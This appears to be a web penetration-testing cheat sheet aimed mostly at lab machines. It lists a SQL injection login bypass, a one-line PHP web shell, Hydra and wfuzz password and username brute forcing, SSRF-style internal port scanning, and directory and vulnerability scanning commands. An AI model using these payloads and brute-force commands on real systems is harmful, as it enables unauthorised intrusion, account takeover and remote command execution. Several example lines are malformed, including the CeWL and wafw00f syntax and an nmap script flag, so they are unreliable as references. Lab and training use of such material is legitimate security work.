Simple SQL Injection to try on login form
admin:’ OR ‘1’=’1
Using Nmap to scan for http exploits
sudo nmap –scripts=http-vul* -p 80 <IP Address>
nmap -Pn -sV -sC -vvvvv -p 80 192.168.1.1
Curl Grab service banner
curl -i [IP]
Read robot.txt good place to find directorys that user does not want to be searched by google
curl http://example.com/robots.txt
Using dirb to scan website directory for certain folders or files
dirb http://<IP Adddress>:PORT
dirb http://<IP address> -X .php,html,txt
Dirb http://<ip address> -r
# This is good options for website which you want ignore the SSL
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://10.10.10.7 -k -x txt,php,html -t 40
gobuster dir -u http://jail.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
gobuster dir -u shocker.htb/cgi-bin -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,pl,py
gobuster dir -u http://10.10.10.73 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x aspx -t 30
WhatWeb
whatweb [IP]:[PORT] –color=never –log-brief=”[OUTPUT].txt”
Nikto
nikto -host=http://10.0.0.1
SSL Scan
sslscan $RHOST
#
python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.9/ -e php -x 403,404 -t 50
Check WebDav
davtest -url http://10.10.10.14
# Using Hydra to brute force password for admin user
hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form “/department/login.php:username=admin&password=^PASS^&proc_login=true:Incorrect password”
# wfuzz example of trying to find valid users
wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt –hs “No account found with that username.” -d “username=FUZZ&password=password” http://10.10.10.97/login.php
# wfuzz example of trying to find user password
wfuzz -c -w /usr/share/wordlists/rockyou.txt –hs “The password you entered was not valid.” -d “username=tyler&password=FUZZ” http://10.10.10.97/login.php
# Simple PHP shell
<?php echo system($_REQUEST[“ipp”]); ?>
#WFUZZ very good option to use instead of burp suite.
wfuzz -c -z range, 1-65535 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
# Only show ports that are responding
wfuzz -c -z range,1-65535 –hl=2 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ
CeWL – CeWL creates customer wordlists based on a specific URL by crawling the web page and picking relevant words. This can be utilized to assist in bruteforcing web page logins.
Example Syntax:
If http:
http://[IP]:[PORT]/ -m 6, “http,https,ssl,soap,http-proxy,http-alt”
If https:
https://[IP]:[PORT]/ -m 6, “http,https,ssl,soap,http-proxy,http-alt”
wafw00f – Wafw00f identifies if a particular web address is behind a web application firewall.
Example Syntax:
If http:
wafw00f http://[IP]:[PORT], “http,https,ssl,soap,http-proxy,http-alt”
If https:
wafw00f https://[IP]:[PORT], “http,https,ssl,soap,http-proxy,http-alt”
Gobuster – Gobuster is a directory/file busting tool for websites written in Golang. This tool can be run multiple ways, but two main busting strategies are almost always used:
Utilize a wordlist of common files/directories.
Utilize a wordlist of common cgis.
Common Directory Busting Example Syntax:
If http:
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://[IP]:[PORT] -s “200,204,301,307,403,500”
If https:
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://[IP]:[PORT] -s “200,204,301,307,403,500”
Common CGI Busting Example Syntax:
If http:
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://[IP]:[PORT] -s “200,204,301,307,403,500”
If https:
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://[IP]:[PORT] -s “200,204,301,307,403,500”